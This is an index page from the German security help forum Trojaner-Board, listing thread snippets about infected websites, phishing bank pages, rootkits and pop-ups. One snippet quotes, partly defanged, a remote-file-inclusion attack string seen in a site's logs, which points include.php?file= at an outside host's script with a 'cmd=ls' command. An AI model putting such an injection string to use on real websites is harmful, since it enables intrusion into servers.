Zurück   Trojaner-Board > Themen

Alles zum Thema: Quelltext

  Letzter Beitrag Antworten Hits Forum
Trojaner wird per iframe auf Website eingebunden
Quelltext - Hallo zusammen, mein Problem hat weniger in einem infizierten PC zu tun, sondern mit einer Website, die einen Trojaner verbreitet. Sachverhalt ist folgender: Auf der Website hxxp://xxx.tus-obermuenstertal.de wird seit ca. 1 Woche im Seitenquelltext ein <iframe...
Plagegeister aller Art und deren Bekämpfung
Banking TAN Abfrage
Quelltext - Hallo Forumgemeinde, ich bin mir nicht sicher ob das in diese Rubrik gehört aber ich habe mal den Quelltext einer ausgetauschten Bankseite gesichert. Die übliche Seite ist gegen eine Seite mit 10 TAN-Nr. abfragen ausgewechselt worden. Vielleicht kann mir ja jemand erklären, was für...
Plagegeister aller Art und deren Bekämpfung
SystemDatei [brmrhle.sys] = RKIT Ich kanns nicht löschen
Quelltext - Also ich habe alles versucht Aber Es Will nichts funktieren ... Ich habe Folgende Tools Benutzt ComboFix Mein AntiVirus Avast 5 Interet Security Killbox Hjackthis Nichts will funktieren
Plagegeister aller Art und deren Bekämpfung
h**p://www.Brenz.pl/rc/
Quelltext - Hi ihr, ich habe gerade einen frisch formatierten PC vor mir, der leider letzten Monat von Viren und Trojanern überwältigt wurde. Jetzt versuche ich grade, so langsam alle gesicherten Daten wieder rüberzuziehen und z.B. an meiner Homepage weiterzuarbeiten. Nun fiel mir dabei auf, dass sich auf...
Plagegeister aller Art und deren Bekämpfung
Wurde diese Myspace Seite gehackt ? Aus Quelltext erkennbar ?
Quelltext - Hi, erstmal sorry, ich war mir echt nicht sicher, wo ich das hätte posten können. Habs jetzt einfach mal hier gepostet. Wusste nicht ob es vll hätte bei Überwachung, Sicherheit & Spam oder so gepostet werden sollen. Hab eine Frage. Das hier ist die Myspae Seite meiner Band. ...
Plagegeister aller Art und deren Bekämpfung
Trojaner schreibt sich bei jedem Booten in den Quelltext meiner Webseiten
Quelltext - Hallo, Ich habe folgendes Problem: Ein Besucher meiner Webseite hat sich dort einen Trojaner eingehandelt. Wenn man sich den Quelltext auf der Index-Seite ansieht, kann man sehen, dass sich dort an unteren Ende ein neuer Link befindet. Ich habe alles vom Server genommen und neu draufgespielt, aber...
Plagegeister aller Art und deren Bekämpfung
"Ziel speichern unter" speichert statt wmv datei nur ein html Dokument
Quelltext - Hallo, ich will mir ne wmv datei runterladen wofür sogar ein downloadlink angegebn ist (download this file: 123456.wmv). Wenn ich auf den Link linksklicke öffnet sich ne neue weiße Seite. Ich kann mich auch erinnern auf der gleichen Seite die Datei mit rechtsklick und dann "Ziel speichern unter"...
Alles rund um Windows
I love you - Virus
Quelltext - Guten Abend.. Da wir auf unserem Firmenserver einen größeren Virus haben, hab ich mich an der Arbeit über die schlimmsten Viren allgemein ein wenig erkundet. Ich bin auf folgenden Beitrag gestoßen: http://de.wikipedia.org/wiki/Loveletter Fragt mich nich warum, aber ich habe unter Weblinks...
Plagegeister aller Art und deren Bekämpfung
nervige popups
Quelltext - Hallo, ich habe seit kurzem ein Problem mit Popups beim Firefox. alle paar Minuten öffnet sich im Hintergrund ein Werbefenster das erstaunlicherweise oft was mit der Seite zu tun hat, auf der ich grad bin; eben kam zb hier auf dem board eine werbung für McAffee. Firefox neuinstallieren hat nichts...
Plagegeister aller Art und deren Bekämpfung
Gumblar - Redirecter
Quelltext - Hallo zusammen, leider gibt es noch kein Topic zu meinem Problem. Ich habe seit längerem Scripts auf meiner Website welche sich auf einen Server verbinden der dann einen Trojaner los lässt. Ergo - erscheinen beim besuch meiner Website Trojanermeldungen (mit avast). ich habe diverse massnahmen...
Plagegeister aller Art und deren Bekämpfung
Suspeckte Datei per ICQ erhalten... was tun ?
Quelltext - Hallo an alle, Habe heute von einem mir eigentlich bekannten ICQ-Kontakt, eine Datei zugesendet bekommen. Ich öffnete diese ohne darüber nachzudenken und nichts geschah. Ich bemerkte erst jetzt das es eine .exe datei war, das machte mich ein wenig stutzig drum rief ich die Person an von der...
Plagegeister aller Art und deren Bekämpfung
HEUR/HTML.Malware Warnung auf Homepage
Quelltext - Guten Tag! Ich habe ein Problem! Wenn man auf meine Seite geht dann kommt eine AntiVir-Meldung: Enthält verdächtigen code : HEUR/HTML.Malware Kann mal jemand, der sich da auskennt, den Quelltext ansehen und Suchen, woher die Meldung kommen könnte?
Plagegeister aller Art und deren Bekämpfung
merkwürdiger Quelltext
Quelltext - Hi, ich habe von einem Bekannten einen Anruf bekommen das immer wenn er seine Webseite aufruft der Virenscanner ausschlägt, und eine potentielle Maleware Infektion meldet, ich habe daraufhin mal den Quelltext durchsucht, und folgendes gefunden... *** Kann mir jemand sagen was das sein soll? ...
Mülltonne
Darstellung von bestimmten html-Mails in Thunderbird
Quelltext - Einige Mails werden hier in Thunderbird nicht richtig bzw nur im Quelltext angezeigt. Ich erkenne hierbei aber kein Schema. Diese Mail wird richtig angezeigt: From - Thu, 31 Jul 2008 14:14:25 To: Me Date: Thu, 31 Jul 2008 14:14:25 +0100 Subject: AW:...
Alles rund um Windows
Erhalte 40 total leere Emails 0Kb. groß
Quelltext - Hallo, ich habe folgendes Problem: Ich erhalte seit einigen Tage komplett leere Emails. Heute waren es 40 Stück. Kein Absender, kein Empfänger, kein Betreff, ein leerer Quelltext und die Email ist genau 0 Kb. groß. (Screenshot im Anhang).
Plagegeister aller Art und deren Bekämpfung
Programmieren
Quelltext - allso..ich schreib hier einfach mal nen konkreten fall damit die leute die sich auskennen mir helfen können:party: allso hab nen quelltext in Visual c++ 2008 Express Edition geschrieben..leida bin i noch ganz am anfang und hab keine ahnung wie ich des bei dem programm visualieseren soll...sprich...
Alles rund um Windows
Frage zu einer website mit Java ( Virus? )
Quelltext - Also ich bekam vorhin in Icq eine Nachricht: FaBiAn ‎(21:30): h*tp://www.knudd3ls-win.de/ Klickt man darauf kommt eine Meldung von Antivir HTML - ?? Naja dann habe ich mir mal den Quelltext angeschaut und man sieht einen extreme langen Java-"Text" , ich hae versucht den zu entschlüsseln...
Plagegeister aller Art und deren Bekämpfung
Frage zu einer website mit Java ( Virus? )
Quelltext - Also ich bekam vorhin in Icq eine Nachricht: FaBiAn ‎(21:30): h*tp://www.knudd3ls-win.de/ Klickt man darauf kommt eine Meldung von Antivir HTML - ?? Naja dann habe ich mir mal den Quelltext angeschaut und man sieht einen extreme langen Java-"Text" , ich hae versucht den zu entschlüsseln...
Antiviren-, Firewall- und andere Schutzprogramme
Erstellen & erkennen von Forenbeiträgen....
Quelltext - ....eine Verständnisfrage: :o Wenn ich beispielsweise hier im „Trojaner-Board-Forum“ einen Beitrag schreibe, ist dann für jedermann nachvollziehbar von welchem PC aus dieser Beitrag erstellt wurde ? Sind Details wie IP-Adresse, Stadt, Betriebssystem usw. für jeden User nachvollziehbar oder...
Überwachung, Datenschutz und Spam
Trojaner-Download bei Aufruf einer Webseite
Quelltext - Hallo, Bei der Registrierung in einem von mir betriebenen Board hat ein User eine Webseite hinterlegt. Beim Aufruf dieser Webseite w**.youngladies.de :snyper: meldet mir Kaspersky Antivirus 6.0 folgendes: gefunden: trojanisches Programm Trojan-Downloader.JS.Psyme.fl URL:...
Diskussionsforum
Programmiersprache Python auslesen.
Quelltext - Also folgende Situation. Ich hab mir aus dem i-net nen skript geladen...und da gibt es einige Dateien mit der entdung .py also Dateien die mit Python geschrieben worden sind. Nun wie kann ich diese dateien starten? Wenn ich momentan die .py dateien öffnen will, öffnet sich der Editor und ich...
Alles rund um Windows
Hab mal ein Frage wegen Trojana gif bzw. hackversuch
Quelltext - Also bei mir auf der Webseite hat heute einer öfters versucht eine fremde Domain zu includen. Das Was er versucht hat sieht so aus h**p://meineDomain.de/include.php?file= und hat das dann angehängt h**p://br.geocities.lasichweg/cmdsharkhackers/cmd.gif?&cmd=ls hab mir dann mal die Seite angeschaut...
Plagegeister aller Art und deren Bekämpfung
MS Outlook Express 5
Quelltext - Hallo, ich bin bei einem Freund welcher folgendes Problem hat: Outlook E. kann die empfangenen Mails nicht anzeigen. Dh. der Titel des Mails wird zwar angezeigt, doch der eigentliche Text nicht. Wenn ich den Quelltext des Mails anschaue, dann kann ich die Nachricht aber lesen (aus dem HTML Code...
Alles rund um Windows
Wo kann man verseuchteseiten Melden
Quelltext - Hi ho...hab mal ne frage... wo kann man seiten melden die mit einem trojaner oder virus verseucht bzw des angebotenen downloads sind... im quelltext der seiten ist nichts über den anbieter bzw besitzer ausfindbar Sorry falls ich gerade in der falschen rubrik schreibe aber wüsste nicht wo...
Überwachung, Datenschutz und Spam
HTML als Hintergrund,wegen spyware[HILFE!]:)
Quelltext - Hi leute...Habe vor kurzem ordentlich viel spyware auf dem pc gehabt..sowie einige dialer usw..Hab auch alles größtenteils entfernt nur eine sache geht einfach nicht weg. Mein hintergrundbild auf dem desktop ist nicht mehr zu sehen ,stattdessen eine Html datei die mich auffordert auf irgend eine...
Log-Analyse und Auswertung
Archiv
Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.